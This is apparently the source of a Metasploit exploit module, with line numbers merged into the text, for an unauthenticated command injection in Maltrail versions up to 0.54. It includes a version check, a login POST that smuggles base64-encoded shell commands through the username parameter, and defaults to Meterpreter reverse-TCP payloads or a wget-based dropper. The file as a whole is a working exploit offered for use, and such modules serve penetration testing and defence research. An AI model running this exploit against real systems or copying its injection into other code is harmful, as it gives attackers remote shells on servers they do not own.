Path: blob/master/modules/exploits/unix/http/maltrail_rce.rb
28839 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10prepend Msf::Exploit::Remote::AutoCheck1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Maltrail Unauthenticated Command Injection',17'Description' => %q{18Maltrail is a malicious traffic detection system, utilizing publicly19available blacklists containing malicious and/or generally suspicious trails.20The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.21The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains22a command injection vulnerability in the `params.get("username")` parameter.23An attacker can exploit this vulnerability by injecting arbitrary OS commands24into the username parameter. The injected commands will be executed with the25privileges of the running process. This vulnerability can be exploited remotely26without authentication.2728Successfully tested against Maltrail versions 0.52 and 0.53.29},30'License' => MSF_LICENSE,31'Author' => [32'Ege BALCI <egebalci[at]pm.me>', # msf module33'Valentin Lobstein', # Add CVE reference + rewrite34'Chris Wild', # original PoC, analysis35],36'References' => [37['CVE', '2025-34073'],38['EDB', '51676'],39['CVE', '2025-34073'],40['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],41['URL', 'https://github.com/stamparm/maltrail/issues/19146']42],43'Privileged' => false,44'Targets' => [45[46'Unix Command',47{48'Platform' => 'unix',49'Arch' => ARCH_CMD,50'Type' => :unix_cmd,51'DefaultOptions' => {52'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'53}54}55],56[57'Linux Dropper',58{59'Platform' => 'linux',60'Arch' => [ARCH_X86, ARCH_X64],61'Type' => :linux_dropper,62'CmdStagerFlavor' => :wget,63'DefaultOptions' => {64'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'65}66}67]68],69'DisclosureDate' => '2023-07-31',70'DefaultTarget' => 0,71'Notes' => {72'Stability' => [CRASH_SAFE],73'Reliability' => [REPEATABLE_SESSION],74'SideEffects' => []75}76)77)78register_options(79[80Opt::RPORT(8338),81OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])82]83)84end8586def check87res = send_request_cgi(88'uri' => normalize_uri(target_uri.path),89'method' => 'GET'90)91return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?92return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 2009394version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}9596if version < Rex::Version.new('0.54')97return CheckCode::Appears("Version Detected: #{version}")98end99100CheckCode::Safe("Version Detected: #{version}")101end102103def execute_command(cmd, _opts = {})104send_request_cgi(105'uri' => normalize_uri(target_uri.path, 'login'),106'method' => 'POST',107'uri_encode_mode' => 'none',108'headers' => {109'ctype' => 'application/x-www-form-urlencoded'110},111'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`"112)113end114115def exploit116case target['Type']117when :unix_cmd118print_status("Executing #{target.name}...")119execute_command(payload.encoded)120when :linux_dropper121print_status("Executing #{target.name}...")122execute_cmdstager123end124end125end126127128